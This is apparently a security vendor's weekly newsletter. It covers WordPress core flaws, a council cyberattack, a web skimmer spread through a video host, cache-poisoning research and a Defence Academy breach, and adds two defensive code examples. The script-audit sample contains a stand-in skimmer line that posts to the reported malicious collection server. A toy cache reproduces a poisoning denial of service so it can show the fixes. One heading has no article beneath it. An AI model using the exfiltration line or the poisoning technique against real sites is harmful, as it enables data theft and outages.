Cyber Security Newsletter Week 6

WordPress Core Vulnerabilities Hit Millions of Sites

WordPress announced that it has patched four high threat level vulnerabilities in the WordPress core itself, flaws that were introduced by the core development team. The WordPress announcement was short on details about how severe the vulnerabilities were. However, the United States government's National Vulnerability Database (NVD), where vulnerabilities are logged and publicized, rated them as high as 8.0 on a scale of 1 to 10, with ten representing the highest danger level.

The four vulnerabilities are:

- SQL injection due to lack of data sanitization in WP_Meta_Query (severity level rated high, 7.4)
- Authenticated Object Injection in Multisites (severity level rated medium, 6.6)
- Stored Cross Site Scripting (XSS) through authenticated users (severity level rated high, 8.0)
- SQL Injection through WP_Query due to improper sanitization (severity level rated high, 8.0)

Three out of the four vulnerabilities were discovered by security researchers outside of WordPress; WordPress was unaware of them until it was notified. The vulnerabilities were privately disclosed to WordPress, which allowed it to fix the problems before they became widely known.

Solutions:
• Web protection
• Review and Monitoring reports
• Cyber Consultancy

Cyber-attack disrupts Gloucestershire Council's website

A council is working to restore parts of its website 11 days after they were crippled by a cyberattack. Gloucester City Council has been trying to fix several of its online services since the incident on 20 December. Systems affected include the council's online revenue and benefits sections as well as planning and customer services. It asked for patience while the services are restored and urged people to email it directly with any issues they have. The council is also working with the National Crime Agency (NCA) and the National Cyber Security Centre (NCSC) to fix the issue. Residents are also unable to access the interactive online application forms used to claim housing benefit, council tax support, test and trace support payments and discretionary housing payments. Due to the attack, the council's planning application website is also unavailable, the Local Democracy Reporting Service said.

Solutions:
• Ransomware protection
• Vulnerability Scanning
• Antivirus

Web skimming attacks on hundreds of real estate websites deployed via cloud video hosting service

Web skimming attacks are targeting hundreds of real estate websites via a cloud-based video hosting service, researchers have warned. Web skimming attacks occur when a malicious script is injected into a site to steal information entered into web forms. For example, an online booking form might ask for a website user’s personal details and payment information; if the site was vulnerable to a skimming attack, the malicious actors could intercept that data. In the case of the attacks described here, the attacker injected the skimmer JavaScript code into the video player, so whenever others import the video, their websites get the skimmer code embedded as well. The researchers detailed how the skimmer infected the websites, explaining that when a user of the cloud platform creates a video player, the user is allowed to add their own JavaScript customizations by uploading a .js file to be included in their player. In this specific instance, the user uploaded a script that could be modified upstream to include malicious content. In the researchers' words: “We infer that the attacker altered the static script at its hosted location by attaching skimmer code. Upon the next player update, the video platform re-ingested the compromised file and served it along with the impacted player.” They added: “From the code analysis, we know the skimmer snippet is trying to gather victims’ sensitive information such as names, emails, phone numbers, and send them to a collection server, https://cdn-imgcloud[.]com/img, which is also marked as malicious in VirusTotal.” The websites in question were all owned by the same parent company, which hasn’t been named. Unit 42 researchers said they have informed the organization and have helped them to remove the malware.
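The injection path described above (a third-party player script that legitimately changes over time, plus an inline snippet posting form data to an outside host) is something a site owner can audit for. The following is an added example, not code from the article or from Unit 42: a small Node.js check that lists the scripts a page embeds and the hosts those scripts talk to, then flags any host outside an allowlist and any external script loaded without Subresource Integrity. All hostnames are constructed except the defanged collection server, which is the indicator quoted in the report.

```javascript
// Added example (not from the article or Unit 42): audit a page's script tags
// and the endpoints referenced in script text against an allowlist.
// Hostnames are constructed; cdn-imgcloud[.]com is the defanged IoC from the report.

const SAMPLE_HTML = `
<html><body>
<script src="https://player.example-video-host.test/player.js"></script>
<script src="https://static.example-realty.test/app.js"
        integrity="sha384-CONSTRUCTED-PLACEHOLDER" crossorigin="anonymous"></script>
<script>
  // constructed stand-in for an injected snippet: only the outbound call matters here
  fetch('https://cdn-imgcloud[.]com/img', { method: 'POST' });
</script>
</body></html>
`;

// Hosts the site owner expects scripts to come from or to send data to (constructed).
const ALLOWED_HOSTS = ['static.example-realty.test', 'player.example-video-host.test'];

// Normalise a possibly defanged URL ("[.]") and return its hostname, or null.
function hostOf(url) {
  try {
    return new URL(url.replace(/\[\.\]/g, '.')).hostname.toLowerCase();
  } catch {
    return null;
  }
}

const SCRIPT_TAG = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
const URL_IN_CODE = /https?:\/\/[A-Za-z0-9.\-\[\]]+(?:\/[^\s'"`)]*)?/g;

// Read one attribute value from a tag's attribute string.
function attr(name, attrs) {
  const m = new RegExp(`\\b${name}\\s*=\\s*["']([^"']*)["']`, 'i').exec(attrs);
  return m ? m[1] : null;
}

// Return every <script> as { src, integrity, body }.
function extractScripts(html) {
  const out = [];
  let m;
  while ((m = SCRIPT_TAG.exec(html)) !== null) {
    const [, attrs, body] = m;
    out.push({ src: attr('src', attrs), integrity: attr('integrity', attrs), body: body.trim() });
  }
  return out;
}

// Produce findings: external script from an unexpected host, external script
// without SRI, or a URL inside script text pointing at an unexpected host.
// In practice, also pass the fetched bodies of external scripts through here.
function auditScripts(html, allowedHosts) {
  const allowed = new Set(allowedHosts.map((h) => h.toLowerCase()));
  const findings = [];
  for (const s of extractScripts(html)) {
    if (s.src) {
      const host = hostOf(s.src);
      if (!allowed.has(host)) findings.push({ kind: 'unexpected-script-host', host, src: s.src });
      if (!s.integrity) findings.push({ kind: 'missing-sri', src: s.src });
    }
    for (const u of s.body.match(URL_IN_CODE) || []) {
      const host = hostOf(u);
      if (host && !allowed.has(host)) findings.push({ kind: 'unexpected-endpoint', host, url: u });
    }
  }
  return findings;
}

console.log(JSON.stringify(auditScripts(SAMPLE_HTML, ALLOWED_HOSTS), null, 2));
```

Two design points. A `missing-sri` finding on the player script is exactly the trade-off in this incident: an integrity hash would have stopped the re-ingested file from executing, but it also breaks every legitimate player update, so vendors rarely ship one. The control that does not depend on the vendor is a Content Security Policy whose `connect-src` and `form-action` directives list only the hosts in the allowlist, which blocks the outbound post to the collection server regardless of how the script arrived; the `unexpected-endpoint` finding is what such a policy would deny.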

Attackers leverage software supply chain to compromise high-traffic sites

Solutions:
• Web protection
• Review and Monitoring reports
• Cyber Consultancy

Researcher discovers 70 web cache poisoning vulnerabilities, nets $40k in bug bounty rewards

Despite being a known and well-documented vulnerability, web cache poisoning continues to crop up around the web. In extensive research of many websites, including some high-traffic online services, security researcher Iustin Ladunca (Youstin) recently discovered 70 cache poisoning vulnerabilities with various impacts. Web cache poisoning attacks target the intermediate storage points between web servers and client devices, such as point-of-presence servers, proxies, and load balancers. These intermediaries help improve the performance of websites by storing local versions of web content to speed up their delivery to web clients. Web cache poisoning attacks manipulate the behavior of cache servers and how they respond to specific URL requests by clients. Several of the web cache vulnerabilities resulted in denial of service (DoS) attacks. Cache servers use some headers as keys to store and retrieve URL requests. By using invalid values in unkeyed headers, Ladunca was able to force the servers to cache error responses and later serve them instead of the original content, which made the target webpages inaccessible to clients.
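The keyed versus unkeyed header mechanism above can be shown in a few dozen lines. The following is an added illustration, not from the article or from Ladunca's research: a toy cache in front of a constructed origin, with a hypothetical `x-example-hint` header that the origin validates but the cache does not key on. One policy reproduces the denial-of-service outcome the text describes; three others show the defensive settings that prevent it.

```javascript
// Added example (not from the article or the researcher): a toy HTTP cache
// showing why caching an error response caused by an unkeyed header blocks
// every later client, and which cache policies prevent that.

// Constructed origin. It validates a header the cache does not key on and
// answers 400 (marked no-store) when the value is invalid.
function originServer(req) {
  const hint = req.headers['x-example-hint']; // hypothetical header
  if (hint !== undefined && !/^[a-z]{1,8}$/.test(hint)) {
    return { status: 400, body: 'bad hint header', cacheControl: 'no-store' };
  }
  return { status: 200, body: `home page (hint=${hint || 'none'})`, cacheControl: 'public, max-age=60' };
}

class ToyCache {
  // policy: { cacheStatuses: number[], keyHeaders: string[], honorNoStore: boolean }
  constructor(policy) {
    this.policy = policy;
    this.store = new Map();
  }

  // Cache key: method, path, and only the headers listed in the policy.
  keyFor(req) {
    const extra = this.policy.keyHeaders.map((h) => `${h}=${req.headers[h] || ''}`);
    return [req.method, req.path, ...extra].join('|');
  }

  handle(req) {
    const key = this.keyFor(req);
    if (this.store.has(key)) return { ...this.store.get(key), fromCache: true };
    const resp = originServer(req);
    const storable =
      this.policy.cacheStatuses.includes(resp.status) &&
      !(this.policy.honorNoStore && /\bno-store\b/.test(resp.cacheControl));
    if (storable) this.store.set(key, resp);
    return { ...resp, fromCache: false };
  }
}

// One request with an invalid unkeyed header, then an ordinary client's request
// for the same page. Returns what the ordinary client receives.
function innocentClientResult(policy) {
  const cache = new ToyCache(policy);
  cache.handle({ method: 'GET', path: '/home', headers: { 'x-example-hint': 'x'.repeat(64) } });
  return cache.handle({ method: 'GET', path: '/home', headers: {} });
}

const POLICIES = {
  // caches any status and ignores Cache-Control: the error is served to everyone
  naive:   { cacheStatuses: [200, 400, 404, 500], keyHeaders: [], honorNoStore: false },
  // fix 1: only cache successful responses
  only2xx: { cacheStatuses: [200], keyHeaders: [], honorNoStore: false },
  // fix 2: let the origin's no-store on error responses win
  noStore: { cacheStatuses: [200, 400, 404, 500], keyHeaders: [], honorNoStore: true },
  // fix 3: any header the origin's response depends on is part of the key
  keyed:   { cacheStatuses: [200, 400, 404, 500], keyHeaders: ['x-example-hint'], honorNoStore: false },
};

// Map of policy name -> { status, fromCache } as seen by the ordinary client.
function compareCachePolicies() {
  const out = {};
  for (const [name, policy] of Object.entries(POLICIES)) {
    const r = innocentClientResult(policy);
    out[name] = { status: r.status, fromCache: r.fromCache };
  }
  return out;
}

console.log(compareCachePolicies());
```

Real caches and CDNs expose the same three knobs: which status codes are cacheable, whether `Cache-Control: no-store` from the origin is honoured, and which headers are part of the cache key (or, from the origin side, named in `Vary`). On the monitoring side, a sudden run of cache hits returning 4xx or 5xx for a popular path is the signal that one of these settings has let an error response in.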

Solutions:
• DDoS Prevention
• Awareness Training (poisoning attacks)
• Web protection (Cache poisoning attacks)

UK’s Defence Academy hit by cyberattack which caused ‘significant’ damage

The attack was possibly launched by a hostile foreign state such as Russia or China, says Air Marshal Edward Stringer. The UK's Defence Academy was hit by a cyberattack last year which caused “significant” damage, according to the retired high-ranking officer. Air Marshal Stringer said the security breach was discovered in March 2021 and the Defence Academy, which teaches thousands of military personnel, diplomats and civil servants each year, was forced to rebuild its network, with the damage yet to be fully rectified months on. Commenting on the likelihood of the attack being linked to a foreign government, like Iran or North Korea, AM Stringer said: “It could be any of those or it could just be someone trying to find a vulnerability for a ransomware attack that was just, you know, a genuine criminal organisation.” The attack is not suspected to have been for financial gain. He said there were “external agents on our network who looked like they were there for what looked pretty quickly like nefarious reasons”. Sky News reported that no sensitive information was stored on the academy's network. AM Stringer said the attack was not successful and, while the hackers may have been using the academy as a “backdoor” to other Ministry of Defence (MoD) systems, there were no breaches beyond the school.

Solutions:
• Ransomware Protection
• End-point protection
• Vulnerability Scanning (Monitor potential loopholes which could impact your business)